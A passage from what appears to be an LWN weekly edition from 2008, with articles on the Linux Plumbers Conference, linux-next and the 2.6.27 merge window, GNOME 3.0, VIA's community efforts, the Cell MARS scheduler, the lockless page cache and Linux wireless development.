definitely been a challenge for a bunch of software engineers to try
and organize a conference, but we've leaned heavily on LF for advice
and we've learned a lot in the past year.


Most conferences are centered around talks in which speakers present
their work, but open source developers often skip the talks so they
can discuss ongoing projects face-to-face.  How is LPC balancing these
needs?


Our format for the conference is based on the idea that we would have
a bunch of "microconferences".  Each microconf is meant to represent
a topic that should be small enough to be able to adequately discuss
in a few hours, and should preferably span multiple project areas.
Each microconf is being organized by a single expert in the area who
dictates the content of the microconf.  The microconf runner may
decide to have a couple talks and an hour or so for discussion, or
they may decide to split the group into teams and solve some specific
problems.  We are leaving this up to the microconf runner to decide,
although we are recommending that talks be not more than 25 minutes in
length so that there is ample time for discussion and questions.


We also have a general track for presentations that do not fall under
our predefined MC topics.  In addition to the rooms for the
microconfs, we have several rooms that are going to be available for
"unconference" style talks.  People wishing to get together in smaller
groups will be able to reserve a room at the beginning of the
conference.  Our larger rooms will also be available in the afternoon
for working sessions.


For several years, developers have been organizing individual
summits and workshops for particular projects, like networking and
file systems.  LPC microconfs are similar, but they're held all in the
same location and time.  Why did you want to put the microconfs
together into one conference?


We did this to encourage cross project communication.  Individual
summits are great for solving narrow problems, but they tend to
compartmentalize developers from each other.


Who is organizing and sponsoring LPC?


LPC is organized by a group of volunteers from the Portland Linux
development community and is underwritten by the Linux Foundation.  We
are a group of developers who just wanted to attend a conference which
didn't happen to exist yet, so we made our own.  Because we are all
volunteers, we have very little overhead for this conference, and the
money our sponsors have given up is being used directly on making the
conference as productive and memorable as we can make it, with
hopefully a little left over to start over again next year.  Our
Platinum level sponsors are Intel and IBM, with NetApp sponsoring at
the Gold level, and HP, MontaVista, and Google at the Silver.  In addition the
Linux Foundation and Portland State University and have given us so
much more than money - they have been true collaborators and we are so
grateful for all their time and effort.


Were there any sponsorships you didn't accept?


Not that I can recall - we actually started fund raising a little late
and missed a lot of people's planning cycles.  We were extremely lucky
that there were so many great sponsors like Intel, IBM, NetApp, HP and
Google that believed our conference was valuable enough to find the
money in their budget despite the short notice.


How did you decide on the location of LPC?


Portland State University was always our first choice for LPC.  We
wanted a non-corporate, friendly environment that was downtown.  It
was very important to us as well to have a "green" conference - hey,
we are Oregonians!  We wanted a place were there were
plenty of hotels and restaurants within walking distance so that
people would not have to rent a car.  In addition, we didn't want the
more traditional convention center or hotel atmosphere, nor could we
afford it.


Tell us more about LPC as a green conference.


As frequent conference-goers, we are all a little dismayed by the
waste generated from conferences.  Disposable drinking cups and
bottled water, flyers and schwag that immediately hits the garbage bin
when you get back to your hotel, and driving around from event to
hotel and back again are just some of the things that we decided we'd
like to not have at our conference.  As such, we are not distributing
printed material at the conference.  We're also limiting our schwag to
only things we've deemed useful, and we are working with our caterers
to reduce paper waste and provide foods from local, sustainable
sources where possible.


How did you get started in Linux kernel development?


I started using Linux in college back in 1994 or 1995 - I wanted to be
able to work on my homework at home rather than in the lab, and all we
had in those days was a horrendously slow modem connection to the
school.  For years afterward, all I wanted to do for a living was to
work on Linux, but it wasn't until around 1999 that I got my first
chance to write some drivers for Linux while working in Intel's
networking division.  I had previously written device drivers for
Netware - a job I'd gotten right out of college.  After working on
out-of-tree drivers for embedded systems and research projects for
many years, I finally joined Intel's Open Source Technology Center in
2005 and was able to start contributing upstream in a meaningful way.


Portland is home to many top Linux developers, including Linus
Torvalds.  Why do you think Portland is so attractive to open source
developers?


Honestly - I have no idea.  People ask this question all the time, and
all we can do is speculate.  I know why a lot of us live here - it's a
great city to live in.  At some point you get enough critical mass of
developers that you start attracting others.  It could be any number
of things.  Maybe because it's easier to thumb our noses at Redmond
from here?


In your opinion, what are some of the most important technical
trends in Linux kernel development today?


Low power features in hardware is driving a lot of kernel development
these days.


Tell us about some of the places you've traveled for your job.


When you work in open source, you have to travel to meet your
"co-workers".  I've had a chance to go to OLS a few times, Sydney for
LCA a couple years ago, and Cambridge last year for Kernel Summit and
LinuxConfEU.  Recently I traveled to FISL in Porto Allegre, Brazil.
I've also been to Ireland for Skycon - a fun and interesting
conference.  I'm actually looking forward to not having to travel to
attend LPC.


Thanks, Kristen, for taking the time to answer our questions.

		Linux-next meets the merge window


Recent LWN articles on the linux-next tree have noted that, while this tree
has been working well in its role of identifying merge conflicts between
subsystem trees, it has not yet been through a full kernel development
cycle.  2.6.27 will be the first kernel release where linux-next was in
existence for the entire preceding cycle; in theory, everything which goes
into 2.6.27 should have been aged in linux-next first.  As the end of the
2.6.27 merge window nears, a look at how linux-next has affected the
process seems warranted.


One might think that linux-next maintainer Stephen Rothwell would be able
to take a break during the merge window; it should mostly be a matter of
watching the linux-next tree drain into the mainline.  As it happens, the
daily linux-next postings (example) suggest
a fair amount of scrambling to deal with merge conflicts, build failures,
and more.  There are a number of reasons for this, one of which being that
subsystem trees are merged into the mainline in an order which is
completely unrelated to their order in linux-next.  Patches which remain in
linux-next are being applied to a highly unstable base.


Another interesting phenomenon has been a fair number of patches appearing
in linux-next during the merge window.  Some of these are actually patches
intended for 2.6.28; once maintainers have dumped their 2.6.27 patches into
the mainline, they are starting to acquire stuff for the next time around.
Stephen has asked them not to do that,
requesting that 2.6.28 material not be directed toward linux-next until
after the 2.6.27-rc1 release.  The goal is that linux-next should be nearly
empty when 2.6.27-rc1 comes out.


Other patches, though, are intended for 2.6.27 but simply have not done
their time in the linux-next tree.  That had led to a certain amount of
developer grumpiness at times.  It is interesting to note, though, that one
of the biggest examples of linux-next avoidance - David Miller's merging of
the multiqueue networking code which he had finished writing hours before -
has generated relatively few complaints.  But various other types of
conflicts have generated a steady steam of terse notes from Andrew Morton
(who is in the unfortunate position of basing his work on top of
linux-next) on how new stuff should have been in linux-next weeks ago.


Another area of, say, colorful conversation has been around the TTY
subsystem, currently been subjected to a much-needed thrashing by Alan Cox.
Some developers have been unhappy with Alan for merging code which failed
to compile, even though those problems had already been identified in
linux-next.  Alan, instead, has become irritated with other developers who
have surprised him with TTY-layer changes of their own, causing Alan's
patches not to apply.  Alan has some quaint notions about actually testing
his patches, so the resolution of this kind of conflict requires the
running of a new set of regression tests and such; after this had happened
a few times in a row, he started getting a little short-tempered.  These issues
would appear to have been worked out at this point, but the idea behind
linux-next was to keep them from happening in the first place.


Yet another source of occasional merge issues is the rebasing of trees.
Rebasing, in git-speak, is the process of modifying the commit history in a
repository to cause a series of patches to look like they were written
against a later version of the code than they really were.  Rebasing can be
a useful technique; it generates a series of patches which applies cleanly
to the current state of the tree without generating a bunch of unsightly
merge commits.


Rebasing can be especially useful in the context of linux-next.  If testing
turns up a patch which breaks the build, simply committing a fix will leave
a period in the history where the kernel cannot be built, and that is bad
for people running bisections.  With the use of git's history editing
features, the offending patch can be fixed in place and all evidence of the
mistake disappears.  In essence, that embarrassing commit mentioning the
Eurasian campaign can be fixed up to properly note that we've always been
at war with Eastasia.


But rebasing a repository changes the history (by design), creating, in the
process, an entirely new set of commits.  Those commits are new code, to
the point that any results from testing the older version may no longer
apply.  The commits also have new names, so any other developer who was
using a version of the repository will be shaken off and unable to merge.
Issues related to rebasing have come up a couple of times during the merge
window, leading Linus to post a series of lectures on
the problems that rebasing can cause.  It is clearly a tool which must be
used with restraint, but occasional use of rebasing can, in the linux-next
context, lead to a better final merge.  Finding the right balance is
something each developer will have to learn.


In the end, the merge window remains a bit of an unruly time.  The process
of channeling the work of several hundred developers into the mainline over
a two-week period is unlikely to ever be an entirely smooth experience.
But, for all its glitches, the 2.6.27 merge window has been (so far!)
easier than 2.6.26.  The presence of the linux-next tree almost certainly
has something to do with that.  This tree's role continues to evolve, but
its benefits are starting to be felt.

		The Elisa Media Center project


Elisa Media Center
is a cross-platform (Windows Vista, XP, and Linux, eventually Mac)
media management project that is sponsored by
Fluendo.
The company is also known for its sponsorship of the
GStreamer
multimedia framework. The Elisa project's
home page explains:


Elisa is an open source cross-platform Media Center featuring an intuitive interface with a professional look and feel which can be easily used with a standard TV remote control. Elisa is designed to be easily extensible through plugins. It relies on Python and
Twisted as core technologies.


Elisa can manage movies, photographs, and music. It can work with
media from locally connected peripherals, other machines on the LAN
and the Internet. The software includes support for IR remotes and
touchscreens.  Elisa uses a modular design with support for
plugins
which give the system access to various media sites and
other information.
A fairly out of date
feature list
explains the capabilities in more detail.
A good way to see the capabilities of the software is to take a look at
the flashy 
demo video and screenshots.


Following on heels of the recently
announced
version 0.5.1 (the initial public 0.5 series release),
version 0.5.2, entitled "Good news everyone" was
announced
this week:


The main outlines of this release are:
- The integration of a media scanner that indexes one's music collection
and allows one to browse it by Artists/Albums, with automatic albums'
covers and artists' photos retrieval;
- The localization of the UI. Thanks to contributions from the community
Elisa is currently fully translated in Spanish, Catalan, French,
Italian, German, Dutch, Polish, Swedish and Brazilian Portuguese.


The Elisa source code is available for
download,
packaged versions for Ubuntu and Debian should appear soon.


		GNOME 3.0 worries


The mood on some GNOME mailing lists in the weeks prior to the
recently-concluded GUADEC conference was somewhat somber; some members of
the community were clearly feeling that GNOME development had slowed down,
that the project lacked vision, and that GNOME was threatening to lose its
relevance with users.  GNOME subsequently emerged from GUADEC with a new executive
director, plans for a 3.0 release, and a new burst of enthusiasm.  It's
amazing what a week in an exotic city with large amounts of beer can
achieve.  Since then, however, the enthusiasm has dropped a bit, and work
on a proposed 3.0 press release appears to
have stalled.  GNOME is now faced with some big decisions, and it's not
clear what the project will do.


The initial driving force behind this effort appears to be a plan by the
developers of the GTK+ toolkit to move to a new ABI without concerning
themselves with backward compatibility.  Years of enforced ABI stability
have left GTK+ with a large pile of compatibility cruft which the
developers would like to leave behind; in addition, there are major changes
planned which would be hard to do in a backward-compatible mode.  So the
GTK+ developers would like to start over with a 3.0 release.  Lots of
planning is being done to make the transition easy; among other things,
care will be taken to ensure that GTK+ 3.0 will coexist nicely with older
installations.  But, in the end, it's an incompatible ABI change.


At this point, the loudest objections seem
to come from Miguel de Icaza.  He fears that a new version of GTK+ will
leave independent system vendors behind and, perhaps, lead to a series of
ABI-breakage events.  In particular, Miguel takes issue with the plan to
make the ABI changes for the GTK+ 3.0 release, and only add the new
features (which, like much of the GNOME 3.0 plan are somewhat fuzzy at the
moment) later.  The needed new features, he says, should be driving the
whole process.  And, if at all possible, those features should be added in
a way which does not require an ABI flag day.


It would appear that the GTK+ developers are determined to make this
change, though, so expect it to go forward.  But a GTK+ change is not the
same as a GNOME change; there is no particular need for GNOME to make a
major release just because an important library it uses has done so.
Anybody who has looked at the linkage of a GNOME application knows that
GNOME uses a lot of libraries; they cannot all drive major GNOME
releases.  So, one might ask, what is happening with GNOME in particular
that warrants a 3.0 release?


This question was, arguably, most eloquently asked by Luis Villa, who has described
GNOME 3.0 as "a terrible idea."  Luis's point is that an ABI change is
not enough to motivate a major release; instead, there must be a
fundamental vision of a better way to do things.  That vision, he says, is
not there now.  This is not an unprecedented situation in the GNOME community:


	2.0 almost failed for this exact reason- before there was a clear
	vision about doing usability/simplicity-centered design, the new
	version number was a huge invitation to insert $VISION here,
	leading to all kinds of crack.


A 3.0 process without a clearly-articulated vision will invite the same
sort of "crack."  It will also throw away the rare public relations
opportunity that comes with a major update:


	Finally, from a media perspective: the reason GNOME 2.0 was a
	success in the Linux media, and the reason KDE 4.0 has been a
	failure, is that GNOME 2.0 had a clear, persuasive story around it:
	simplification and usability. No one in the media cared that we had
	a new toolkit, except where it had specific features (mainly i18n)
	that had user benefits.  Writers ate up our usability story- they
	could tell their readers the story we put out there, and it made
	sense to them. KDE 4 has no coherent user-focused story, so this
	incredible opportunity to reach out to the press has been
	squandered.


There are, certainly, interesting ideas to be found in the GNOME
community.  The online desktop ideas, Document-centric
GNOME, and the mobile initiatives are examples.  But it is true that
nobody has, yet, put together a concept of GNOME 3.0 which is broad
enough to unify and direct all that work while simultaneously being concise
enough to fit onto a bumper sticker.  Chances are good that most GNOME
developers do not know what GNOME 3.0 really means; those outside of
the development community will have even less of a clue.


The KDE 4.0 experience should be on the GNOME project's collective
mind as it ponders a possible 3.0 release. Future KDE users may see KDE 4.0 as
the turning point where their desktop 
started becoming truly great, but, for now, it does not look like a whole
lot of fun for the KDE development community.  GNOME developers, one
assumes, would prefer not to have a similar experience.  


GNOME 2.x has been around for some time; it may well be true that it
is time to make a big jump.  It would be gratifying to see some new energy
and directions from the highly creative GNOME development community.  If
the project can come up with a set of overall goals which can inspire that
community toward a set of common ends, GNOME 3.0 could be a
spectacular success.  But those goals, if they exist, have not been
communicated to the community yet, and that is making some GNOME developers
nervous.

		2.6.27 - the rest of the story


The 2.6.27 merge window closed with the 2.6.27-rc1 release on
July 28.  Some 8100 changesets were merged this time around, making
2.6.27 another busy development cycle.  A number of interesting things went
in since last week's update;
the most significant changes visible to Linux users include: 


 There are new drivers for ILI9320 LCD controller chips,
     Cobalt server LCD frame buffers,
     SH7760/SH7763 integrated LCD controllers,
     NXP pca9532 LED controllers,
     Philips PCA955x I2C LED controllers,
     WMI-based hotkeys on HP laptops,
     Maxim MAX73xx I2C port expanders,
     Micronas DRX3975D/DRX3977D DVB-T demodulators,
     DvbWorld 2102 DVB-S USB2.0 receivers,
     MaxLinear MxL5007T silicon tuners,
     Renesas SH7763 evaluation boards,
     Renesas Solutions AP-325RXA boards,
     Renesas R0P7785LC0011RL boards, and
     Atmel integrated touchscreens.

     Also added is "mISDN," a new, modular ISDN driver intended to replace
     older code for a number of ISDN cards.  Support for using mISDN
     drivers remotely via an IP tunnel has been added.


 The Palm T|X handheld computer is now supported.

 The tmpfs filesystem has gained support for asynchronous I/O.

 The hugetlbfs mechanism can now support multiple huge page sizes.
     There is a new directory (/sys/kernel/hugepages) with
     information on huge page allocations.  The x86 (64-bit) architecture
     now supports 1GB pages; PowerPC can go to 16GB.

 Most system calls which create file descriptors can now accept a set
     of flags; this change allows the race-free establishment of close-on-exec
     semantics, requesting non-blocking opens, and more.  Developers
     wanting to use this capability will have to wait for a version of
     glibc which adds the requisite interfaces.

 The unmaintained v850 architecture has been removed.

 The kexec jump patch set,
     which uses the kexec mechanism as an alternative way of implementing
     suspend-to-disk, has been merged.

 The omfs filesystem has
     been merged.

 /proc now has a file (called syscall) for each
     process; when read, it displays the process's current system call and
     the supplied arguments.

 Linux users hoping to upgrade their systems in the near future will be
     glad to know that 
     a series of patches designed to make the kernel scale to 4096
     processors has been merged.


Changes visible to kernel developers include:


 The tracehook mechanism for defining static trace points (described in
     this article) has been
     merged, along with a number of trace points in the core kernel.

 A new, lockless form of get_user_pages() has been added:


     Details of this interface can be found in this article, with the one
     note that early versions were called fast_gup() instead.
     (See also the related lockless page cache work,
     which was also merged).

 The long-debated mmu-notifiers patch has
     been merged.  The notifiers 
     allow external memory management units (as may be seen in some
     graphics cards or in virtualized guests) to be told about decisions
     made by the core memory management code.

 There is a new framework for debugging boot-time memory
     initialization; there's also "a few basic defensive measures" intended
     to prevent difficult-to-debug boot problems.

 The new function:


     returns a true value if the pointed-to object is on the current kernel
     stack.  

 There is a new macro for issuing warnings:


     It's much like WARN_ON() in that it will produce a full oops
     listing; the difference is the added printk()-style format
     string and arguments.

 A new helper function:


     waits for the specific workqueue job work to finish
     executing. 

 dma_mapping_error() and pci_dma_mapping_error() have
     new prototypes:


     In each case, they have gained a new argument specifying which device
     the mapping is being done for.

 There are a couple of new radix tree functions:


    They are useful for looking up multiple items in a single call.

 Slab cache constructors no longer have a pointer to the cache itself
     as an argument; they now take a single void * pointer to
     the object itself.

 The long list of Video4Linux2 ioctl() callbacks has been
     moved into its own structure (struct v4l2_ioctl_ops) which is
     pointed to by the ioctl_ops member of struct
     video_device. 


Now begins the long task of finding and fixing all the bugs in all this new
code.  If the usual pattern holds, that process will take about two months,
suggesting that we can expect 2.6.27 sometime in October.

		Harald Welte on his new role with VIA


Hiring a well-known free software advocate to oversee efforts to work with
the community is a good plan for any company, but for a company that has
had rocky community relations, it may be essential.  VIA Technologies has
done just that, by contracting with Harald Welte to help guide its
strategy to work more closely—and less contentiously—with the
community.  VIA announced a
new effort aimed at cooperation with the free software world last April,
but got off to a slow start that had people wondering about its commitment to
fulfilling that promise.  Welte will be well placed to ensure that
community concerns are heard within VIA.


Highly visible in the community for his work on things like
netfilter/iptables and, more recently,
the Openmoko phone, Welte
has the skills to provide VIA with excellent advice.  He has also won
several awards for his work on GPL enforcement as founder and driving force
behind the gpl-violations.org project.  We
caught up with Welte at this year's Ottawa Linux Symposium to discuss his
new role.


Because of his work on Openmoko, Welte had been traveling frequently
to Taiwan, making a number of industry
contacts amongst the companies located in Taiwan.  About nine months ago,
he was "invited to talk to VIA and give them some feedback from the
community".  The company, he says, knew from the beginning it needed
community input, but how to get that was not decided until late May or early
June, when they asked Welte provide it on a regular basis.


The push from within VIA came from management, specifically product
management, which is somewhat surprising—in
the US and Europe, at least, it is typically engineering that pushes for better
community relations.  "It's a really big opportunity for me being a
representative of the community to talk to a company at this high of a
level.  That's what makes me very optimistic."


[PULL QUOTE: 
It's a really big opportunity for me being a
representative of the community to talk to a company at this high of a
level.  That's what makes me very optimistic.
 END QUOTE]


VIA primarily needs to get drivers and other software for their graphics
hardware cleaned up and submitted upstream.  It is not just the X.org
drivers for 2D and 3D graphics that need to be mainlined, there are also DRM
and DRI patches that are maintained out-of-tree.  He wants to see kernel
patches get moved upstream to kernel.org, while X patches get merged into
X.org code.  A free 2D driver supporting most VIA chips, old and new, will be
available soon.


Welte sees his role as "focusing more on the open source strategy inside
VIA".  That includes improving the skills of VIA's R&amp;D group so that they
produce drivers that are mainline quality.  Various kinds of problems exist
in the drivers, the coding style may not meet the kernel requirements or
they may not use the proper APIs.  Currently, drivers exist for new
products that are supposed to ship with mainline drivers available; Welte
will help ensure that happens. "I perceive myself as community person
rather than a VIA person."


He points to Intel as a "shining star" example of supporting free
and open 
source software, though "sometimes they might focus a bit too much on
drivers than on open documentation," especially for wireless hardware.
One of the areas that VIA is working on is open documentation for its
hardware, but Welte isn't sure when those will be released—though
some 800 pages were
released this week.  Schedules are
largely out of his control, as they are subject to a wide variety of
variables within VIA.


His role with VIA is a chance to "really make a silicon manufacturer
understand how the 
open source community works and what the benefits are to working with
it". 
He will be traveling back and forth from his home in Berlin quite a bit;
"that's good, I love Taipei".  He has also started to learn to
speak 
Chinese.


It seems like a great fit that, in some ways, Dave Jones predicted in his
blog posting linked above: "I'm beginning to think the only way VIA will
ever really 'get it together' is if they employed someone from the Linux
community who actually understands how all this works, because it seems
someone in Taiwan isn't getting the memos."  Perhaps a little late,
but it 
seems that VIA has gotten and understood the memos now.


		MARS and The Cell Broadband Architecture


This article is based on a talk given by Geoff Levand at the
Linux Symposium
in Ottawa on July 24, 2008.


The latest
TOP500 Supercomputers list was released last month and the new front-runner
is using a processor quite unlike what you would find in your laptop.


The Cell Broadband Architecture (simply referred to as "Cell" in this article) was produced as a joint venture between IBM, Toshiba and Sony.  The Cell is available in server hardware but is most commonly found in Sony's Playstation 3 gaming console.


The Cell is interesting because of its unusual design and performance characteristics.  The Cell is described as a heterogeneous multicore CPU.  It has one Power Processing Element (PPE) which is a general purpose processor and up to 8 Synergistic Processing Elements (SPEs).  An SPE is a high-performance vector processing unit with 256KiB of local memory and its own DMA unit.  The PPE, SPEs and memory and I/O controllers are connected by a high speed bus.

The PPE is quite slow compared to modern processors so the SPEs must be used to achieve good performance.  This means writing software that takes the Cell's design into consideration because there is no simple way to optimize existing applications.  Once an application has been designed to use the Cell's SPEs effectively it may run many times faster than when run on a traditional CPU.  


GCC with the Cell SDK can emit code for both the PPE and SPEs, including passing messages and managing overlays when the SPE code size exceeds 256KiB.  The Linux kernel can also manage multitasking the SPEs with its scheduler.  These conveniences make it easier to write code for the Cell processor, but they can have a significant impact on performance.  Preemptive multitasking on an SPE involves swapping all the
local memory of the current process with the local memory of the process to be
run.  This requires time and bus bandwidth for the processor.  Ideally you would always have at least as many SPEs as processes you need
to run so that your process would never be swapped out.


The Multicore Application Runtime System (MARS) framework is a prototype of a
cooperative multitasking system for the Cell that tries to address the performance overhead of running many processes on the Cell's available SPEs. 
MARS uses a library on the PPE and a very small kernel on the SPEs.


MARS currently has a priority-based cooperative scheduler.  This scheduler lets you specify how much context you need to save when your process is swapped out.  In the "run complete" case no context needs to be saved allowing
the next process to run much more quickly.


Synchronizing of processes is commonly required between the Cell's SPEs and PPE.  The only way to synchronize with the existing Cell SDK is to cause your SPE to busy-wait on a semaphore, but the MARS scheduler gives you the option of swapping out a process and doing other work instead.


Cooperative multitasking does have its downsides.  You lose protection between your processes, and one process could hang and require intervention to release the PPE.  It is also necessary to place manual yield points
through your code or design each process to be short-lived.  However, if your application needs to make the most of the Cell architecture, MARS is a promising starting point and addresses the need for a more efficient approach to scheduling.


		The lockless page cache


One of the biggest problems in kernel development is dealing with
concurrency.  In a system where more than one thing can be happening at
once, one must always take care to keep multiple threads of control from
interfering with each other and corrupting the system as a whole.  In the
same way that two roads become more dangerous when they intersect,
connecting two or more processors to the same memory greatly increases
their potential for the creation of mayhem.

Travelers to the US are often amused (or irritated) by the often-favored
solution to roadway concurrency: putting in traffic lights.  Such a light
will indeed (if observed) eliminate the potential for a number of
unpleasant race conditions within intersections, but at a performance cost:
traffic going through the intersection must often stop and wait.  This
solution also scales poorly; as more roads (or lanes with different
destinations) feed into the same intersection, each of them experiences
more red-light time.


In kernel programming, the first tool for controlling concurrency - locks
in various forms - are directly analogous to traffic lights.  It is not
coincidental that the name for a common locking primitive (semaphore)
matches the name for a traffic light (semaforo) in a number of
Latin-derived languages.  Locks enforce exclusive access to a kernel
resource in the same way that a traffic light enforces exclusive access to
an intersection, and with many of the same costs.  When too many processors
end up waiting at the same lock, the performance of the system as a whole
can suffer significantly.


There are two common approaches to mitigating scalability problems with
locks.  For many years after the 2.0 kernel came out, these problems were
addressed through the creation of more locks, each controlling a smaller
resource.  Lock proliferation is effective, in that it reduces the chance
that two processors will be trying to acquire the same lock at the same
time.  Since it works so well,  this approach has led to the creation of
thousands of locks in the Linux kernel.


Proliferation has its limits, though.  Adding locks increases complexity;
in particular, with more locks, the chances of creating occasional deadlock
situations increase.  Deadlocks can be avoided through the careful
observation of rules on the acquisition of locks, and the order in which
they are acquired in particular.  But nobody will ever be able to sort out
- and document - the proper relative locking order for thousands of locks.
So kernel developers must make do with rules for some of the most important
locks and the vigilance of the lockdep tool to find any remaining problems.


The other problem with lock proliferation is harder to get around, though.
The acquisition of a lock requires writing a value to a location in shared
memory.  As each processor acquires a lock, it must change that value,
which causes that processor to acquire exclusive access to the cache line
holding the lock variable.  The cache lines for heavily-used locks will fly
around the system in a way that badly hurts performance, even if no
processor ever has to wait for another to release the lock.  Adding more
locks will not fix this problem; instead, it will just create more bouncing
cache lines and make things worse.


So, as the number of processors grows, the path to continued scalability
must not include the wholesale creation of new locks; indeed, it requires
the removal of locks in the most performance-critical paths.  And that is
what this whole long-winded introduction leads up to: the 2.6.27 kernel
will include some changes by Nick Piggin which implement lockless operation in some
important parts of the virtual memory subsystem.  And those, in turn, will
lead to faster operation on multiprocessor systems.


The first of these changes is a new function for obtaining direct access to
user-space pages from the kernel:


This function works much like get_user_pages(), but, in exchange
for some limits on its operation, it is able to do its job without
acquiring the mmap semaphore; that, in turn, can lead to a 10% performance
boost on "a threaded database workload."  The details of how this function
works were covered here last
March (though the function was called fast_gup() back then),
so we'll not repeat that discussion here.

The other big change is a set of patches which Nick has been carrying for
quite some time: the lockless page cache.  The page cache holds in-memory
copies of pages from files on disk; its purpose is to improve performance
by minimizing disk I/O.  Looking up pages in the page cache is a common
activity; it happens as a result of file I/O, page faults, and more.  So it
needs to be fast.  In 2.6.26 kernels, each mapping (each connection between
the page cache and a specific file in a filesystem somewhere) has its own
lock.  So processors will not normally contend for the locks unless they
are operating on the same file.  But locks for commonly-accessed files
(shared libraries, for example) are likely to be frequently bounced between
processors.

Most page cache operations are lookups - read-only operations which make no
changes.  In the lookup operation, the lock protects a few aspects of the
task, including:


 A given page within the mapping must be looked up in the mapping's
     radix tree to find its
     location in memory (if any).

 If the page is resident in the page cache, it must have its reference 
     count increased so that it will not be evicted before the code
     performing the lookup has done whatever it needs to do.


The radix tree, itself, is a complicated data structure; it must be
protected from modification while the lookup is being performed.  For
certain, performance-critical parts of the radix-tree code, that protection
is done through (1) some rules on what can be called when, and
(2) the use of read-copy-update (RCU).  As a result, the radix tree
lookup can be done in a lockless manner.

There is still a problem, though: a given page may be evicted from the page
cache (or simply moved) between steps (1) and (2) above.  Should that
happen, the second step will increment the reference count for a page which
now belongs to a different mapping, and return an incorrect pointer.  The
kernel developers have, through lots of experience over many years, learned
that system crashes resulting from data corruption are quite hard on
throughput.  So true scalability requires that this kind of scenario be
avoided; thus the mapping semaphore, which prevents page cache changes from
being made until the reference count has been properly updated.

Nick made an interesting observation here: it actually doesn't matter if
the wrong reference count gets incremented as long as one ensures that the
specific page mapping is still valid afterward.  The result is a new,
low-level page cache function:


If the given page has a reference count of zero, then the page has
been removed from the page cache; in that case this function return zero
and the reference count will not be changed.  If the reference count is
non-zero, though, it will be increased and a non-zero value will be
returned. 

Incrementing a page's reference count will prevent that page from being
evicted or moved until the count goes back to zero.  So kernel code which
has incremented a specific page's reference count will thereby ensure that the page
stays in its current state.  In the page cache case, the code can obtain a
speculative reference to a page found in a mapping's radix tree.  But it
does not, yet, know whether it actually got a reference to the page it was
looking for - something may have happened between the radix tree lookup and
the obtaining of the reference.  So it must check - after the reference has
been acquired - to be sure that it has the right page.  If not, it releases
the reference and tries again.  Eventually it will either pin down the right page
or verify that the relevant part of the file is not resident in memory.

Lockless operation forces a bit more care on the part of the page reclaim
code, which is trying to get a page's reference count down to zero so that
it can remove the page.  Since there is no locking around the reference
count now, the reclaim code must set it to zero while checking, in an
atomic manner, that nobody else has incremented it.  That is the purpose
of the atomic_cmpxchg() function, which will only perform the
operation if it does not collide with another processor.  Since
page_cache_get_speculative() will not increment the reference
count if it is zero, the reclaim code knows that, by getting that count to
zero, it now has exclusive control of the page.


The end result of all this is that a set of locking operations has been
removed from the core of the page cache, improving the scalability of that
code.  There is, of course, a cost, in the form of trickier code with a
more complex set of rules which must be followed.  Chances are that we will
see more of this kind of code, though, as the number of processors in our
systems increases.

		OLS: The state of Linux wireless networking


Kernel wireless maintainer John Linville outlined the past, present, and future
of the Linux wireless stack on the first day of this year's Ottawa Linux Symposium.  In
his presentation, he ranged from early efforts, which were "a sore
spot for Linux" to the future where it is likely that Linux will have
support for some features before "that other OS".  Along the
way, he looked at various issues that wireless support in Linux faces,
including vendor participation, suspend and resume, and regulatory issues.


Linville has been the maintainer Linux wireless for two and a half years since
being recruited into the job by David Miller and Jeff Garzik.  When he took 
over, wireless support was in disarray, as there were competing stacks to
support different hardware.  Users were faced with lots of pain in getting
things working when "they just want their hardware to work"
said Linville. Since that time, things have greatly changed.


The original wireless hardware was what is called "Full MAC hardware",
where the implementation of the wireless protocols was handled by the
hardware, generally in firmware.  The drivers made these devices appear to
be regular wired ethernet devices, though they did require some special
configuration for SSID and the like.  Because the hardware would enforce
various regulatory requirements, vendors would generally work with the
community in order to support the hardware.


All of that changed with the advent of "Soft MAC hardware"—which
Linville likened to winmodems—where the CPU implements most of the
protocol.  It is a cheaper solution for vendors, but it requires an 802.11
stack for the kernel.  The ieee80211 drivers came along to support
the Intel Centrino wireless hardware, but they only supported those few
devices.  Johannes Berg added the ieee80211softmac driver that
added some additional hardware support, but it was a kludgy solution.
Since then, Linville said, folks have realized that it was "sort of a
mistake to go down that road".


Enter the Devicescape stack.  It was a feature rich 802.11 stack for Linux
that was popular with developers.  After some locking and SMP problems were
resolved, it was merged into 2.6.22 as the mac80211 driver.  Once
that happened, wireless drivers 
started using it, to the point where Linville showed a chart of the current
drivers, almost all of which use mac80211. "It's been a boon
to us to pick up the mac80211 code."


One notable driver that does not support mac80211 is the libertas
driver for the OLPC.  Unlike most other current devices, it is a Full MAC
device with special requirements.  It has support for power saving modes
that do not yet exist in mac80211.  Because it is a mesh-networking
device that still participates in forwarding network traffic when the
system is powered down, it has needs that are not yet supported.


Drivers in progress was the next topic Linville addressed.  Several of
these are in need of developers to work on them, specifically for the Airgo
chipset and Atmel USB chipset.  The TI chipset drivers have had some
questions raised about the reverse engineering process and may require a
legal vetting similar to what the SFLC did for ath5k.  Marvell is
sponsoring development of a mac80211 based driver for its
hardware.  This driver may also support 802.11n which allows for greater range
and higher speeds than current-generation 802.11.


Using data from LWN, Linville looked at the activity level of the wireless
development in Linux.  He was amazed to note "how much of the 2.6.26
kernel came through this laptop".  Using his Signed-off-by as a
proxy for wireless LAN commits, he noted 4.3-5.6% of the kernel commits in
the last three releases (.24 through .26) were for wireless.  In each
kernel, wireless was either the fourth or fifth highest number of commits.


The compat-wireless-2.6 project is aimed at supporting newer hardware in
older kernels.  Because folks are wary of running kernel.org kernels or
their distribution supports an older kernel—but they want to run with the
latest hardware—the project backports wireless drivers to kernels as
old as 2.6.21.  It is a set of scripts and patches that build against the
user's kernel.  Unfortunately, the project may not last much longer as the
multiqueue changes that have been merged for 2.6.27 may change the drivers
enough that they will be infeasible to backport.


At the top of the list for new features is removal of the wireless
extensions in favor of the new cfg80211 mechanism. According to
Linville, "nobody likes wireless extensions, and nobody likes the
existing 
tools".  The wireless extensions have vague semantics, can have
problems with race conditions, and because they are implemented by
ioctl() calls, they encourage duplication of code in multiple
drivers.  cfg80211 will bring a much cleaner API along with
fixing some existing bugs like the 31 character limit for SSIDs.


Access point (AP) mode is another feature that is coming.  Typically, APs
use similar or identical hardware to that in wireless MACs.  For Soft MAC
hardware, all that is needed is support on the CPU side for AP mode, which
is coming for mac80211.  Mesh networking, which has been
popularized by the OLPC project, is also coming to mac80211.
Cozybit has provided an implementation which will allow Linux to have a
feature unavailable for Windows.


Areas that are needed, but are not yet being worked on was next on
Linville's agenda.
Suspend and resume support is "flawed for mac80211
due to connection management issues".  Because mac80211 is
